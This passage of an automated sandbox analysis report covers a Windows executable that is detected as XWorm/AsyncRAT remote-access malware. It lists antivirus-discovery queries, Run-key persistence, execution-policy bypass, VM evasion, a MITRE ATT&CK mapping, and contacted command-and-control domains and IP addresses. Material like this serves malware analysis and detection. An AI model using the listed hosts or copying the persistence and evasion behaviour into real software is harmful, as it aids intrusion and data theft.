            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C17F000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C13E000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C0D0000.00000004.00000020.00020000.00000000.sdmp, Zvas34nq1T.exe, 00000000.00000002.2979655604.000000001C12F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: Zvas34nq1T.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Zvas34nq1T.exe PID: 7276, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: Zvas34nq1T.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Zvas34nq1T.exe PID: 7276, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		21
            Registry Run Keys / Startup Folder            		11
            Process Injection            		11
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		1
            DLL Side-Loading            		21
            Registry Run Keys / Startup Folder            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543338 Sample: Zvas34nq1T.exe Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 36 have-lucia.gl.at.ply.gg 2->36 38 develop-versions.gl.at.ply.gg 2->38 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 11 other signatures 2->54 8 Zvas34nq1T.exe 1 5 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        signatures3 process4 dnsIp5 40 develop-versions.gl.at.ply.gg 147.185.221.21, 49789, 49864, 65059 SALSGIVERUS United States 8->40 42 have-lucia.gl.at.ply.gg 147.185.221.23, 49928, 49998, 50010 SALSGIVERUS United States 8->42 44 127.0.0.1 unknown unknown 8->44 34 C:\Users\user\AppData\Roaming\explorer.exe, PE32 8->34 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 2 other signatures 8->68 17 powershell.exe 22 8->17         started        20 powershell.exe 23 8->20         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 46 Loading BitLocker PowerShell Module 17->46 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Zvas34nq1T.exe89%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
            Zvas34nq1T.exe100%AviraHEUR/AGEN.1305769
            Zvas34nq1T.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\explorer.exe100%AviraHEUR/AGEN.1305769
            C:\Users\user\AppData\Roaming\explorer.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\explorer.exe89%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            develop-versions.gl.at.ply.gg
            		147.185.221.21
            		truetrue
              		unknown
              have-lucia.gl.at.ply.gg
              		147.185.221.23
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                have-lucia.gl.at.ply.ggtrue
                  		unknown
                  develop-versions.gl.at.ply.ggtrue
                    		unknown
                    develop-versions.gl.at.ply.gg:65059true
                      		unknown
                      127.0.0.1true
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micros4powershell.exe, 00000004.00000002.1895371135.0000016078CD6000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZvas34nq1T.exe, 00000000.00000002.2947487566.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://crl.microspowershell.exe, 00000001.00000002.1781097013.00000150472B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                147.185.221.21
                                		develop-versions.gl.at.ply.ggUnited States
                                		12087SALSGIVERUStrue
                                147.185.221.23
                                		have-lucia.gl.at.ply.ggUnited States
                                		12087SALSGIVERUStrue

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543338
                                Start date and time:2024-10-27 18:05:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:16
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Zvas34nq1T.exe
                                renamed because original name is a hash value
                                Original Sample Name:95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@15/20@2/3
                                EGA Information:
                                • Successful, ratio: 14.3%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 59
                                • Number of non-executed functions: 4
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target explorer.exe, PID 5328 because it is empty
                                • Execution Graph export aborted for target explorer.exe, PID 7440 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7368 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: Zvas34nq1T.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                13:06:06API Interceptor62x Sleep call for process: powershell.exe modified
                                13:07:10API Interceptor120442x Sleep call for process: Zvas34nq1T.exe modified
                                17:07:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
                                17:07:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
                                17:07:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                147.185.221.21aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                  SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                    mIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                      PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                        r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                          ra66DSpa.exeGet hashmaliciousXWormBrowse
                                            Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                              NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
                                                Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                  Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    147.185.221.23fMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                                      vtuLkV5KEW.exeGet hashmaliciousXWormBrowse
                                                        IGznKtHyTp.exeGet hashmaliciousXWormBrowse
                                                          6PJia32WYA.exeGet hashmaliciousNjratBrowse
                                                            lx3vLwrX57.exeGet hashmaliciousXWormBrowse
                                                              SpeedHack666Cheat (no VM detected).exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                                8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                  7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                                    I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        SALSGIVERUSfMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        vtuLkV5KEW.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        IGznKtHyTp.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 147.184.222.141
                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                        • 147.168.56.86
                                                                        6PJia32WYA.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.23
                                                                        aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.21
                                                                        BWoiYc9WwI.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.22
                                                                        fjijTlM2tu.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.22
                                                                        SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                                                        • 147.185.221.21
                                                                        SALSGIVERUSfMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        vtuLkV5KEW.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        IGznKtHyTp.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.23
                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 147.184.222.141
                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                        • 147.168.56.86
                                                                        6PJia32WYA.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.23
                                                                        aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.21
                                                                        BWoiYc9WwI.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.22
                                                                        fjijTlM2tu.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.22
                                                                        SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                                                        • 147.185.221.21

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\explorer.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02jzship.30p.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vdwb3qm.v5w.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpphc3cg.hft.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

